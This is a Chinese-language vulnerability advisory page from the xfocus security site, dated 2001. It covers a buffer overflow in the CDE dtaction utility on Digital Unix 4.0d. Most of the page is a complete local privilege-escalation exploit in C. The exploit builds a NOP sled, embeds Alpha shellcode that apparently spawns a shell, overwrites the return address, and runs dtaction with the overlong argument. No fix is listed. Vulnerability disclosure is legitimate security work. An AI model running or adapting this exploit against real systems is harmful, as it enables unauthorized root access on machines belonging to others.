xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Digital Unix CDE dtaction 缓冲溢出代码


发布时间:2001-11-16
更新时间:2001-11-16
严重程度:
威胁程度:本地管理员权限
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Digital Unix 4.0d CDE dtaction
详细描述
Digital Unix 4.0d CDE dtaction 提送超长参数可导致缓冲溢出。

测试代码
/*
* dtaction-ex.c
* tested : Digital Unix 4.0d , OSF1 V4.0 878 alpha
*
* cc -o dtaction-ex dtaction-ex.c
*
* truefinder , seo@igrus.inha.ac.kr, seo@underground.or.kr
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>


#define NOP 0x47ff041f
#define ALIGNSIZE (9)
#define BUFSIZE (8199 )
#define RETADDR 0x000000011ffffaa0
#define DEFNOPSIZE 7168


char nop[] = { 0x1f, 0x04, 0xff, 0x47, 0x00 };
char retaddr[] = { 0xa0, 0xea, 0xff, 0x1f, 0x01 , 0x00 };


static char shellcode[] =
        "\x30\x15\xd9\x43" /* subq $30,200,$16 */
        "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
        "\x12\x94\x07\x42" /* addq $16,60,$18 */
        "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
        "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
        "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
        "\xfc\xff\x30\xb2" /* stl $17,-4($16) */
        "\xf9\xff\x1f\xd2" /* bsr $16,-28 */
        "\x30\x15\xd9\x43" /* subq $30,200,$16 */
        "\x31\x15\xd8\x43" /* subq $30,192,$17 */
        "\x12\x04\xff\x47" /* clr $18 */
        "\x40\xff\x1e\xb6" /* stq $16,-192($30) */
        "\x48\xff\xfe\xb7" /* stq $31,-184($30) */
        "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
        "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
        "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
        "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
        "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
        "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
        "\x38\xff\x7e\xb2" /* stl $19,-200($30) */
        "\x13\x94\xe7\x43" /* addq $31,60,$19 */
        "\x20\x35\x60\x42" /* subq $19,1,$0 */
        "\xff\xff\xff\xff"; /* callsys ( disguised ) */
        /* ohhara's shellcode */


int
main(int argc, char *argv[] )
{


        char *buf , *buf_ptr;
        int bufsize , alignsize , offset ;
        int i, totalsize;
        
        bufsize = BUFSIZE ; alignsize = ALIGNSIZE ; offset = 0 ;


        totalsize = alignsize + bufsize ;
         buf = malloc( totalsize ) ;



        memset ( buf, NULL , totalsize );


        memset ( buf, 'A', alignsize );
        buf_ptr = (char *)(buf + alignsize );


        for ( i = 0 ; i < DEFNOPSIZE/4 ; i++ )
                strcat ( buf_ptr , nop );


        strcat ( buf_ptr, shellcode );


        for ( i =0 ; i < bufsize - DEFNOPSIZE - strlen(shellcode) - 8 ;
i++ )
                strcat( buf_ptr ,"A");


        strcat ( buf_ptr , retaddr );
  
        execl ("/usr/dt/bin/dtaction", "dtaction", "-user", buf, NULL );
}

解决方案
尚无

相关信息
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved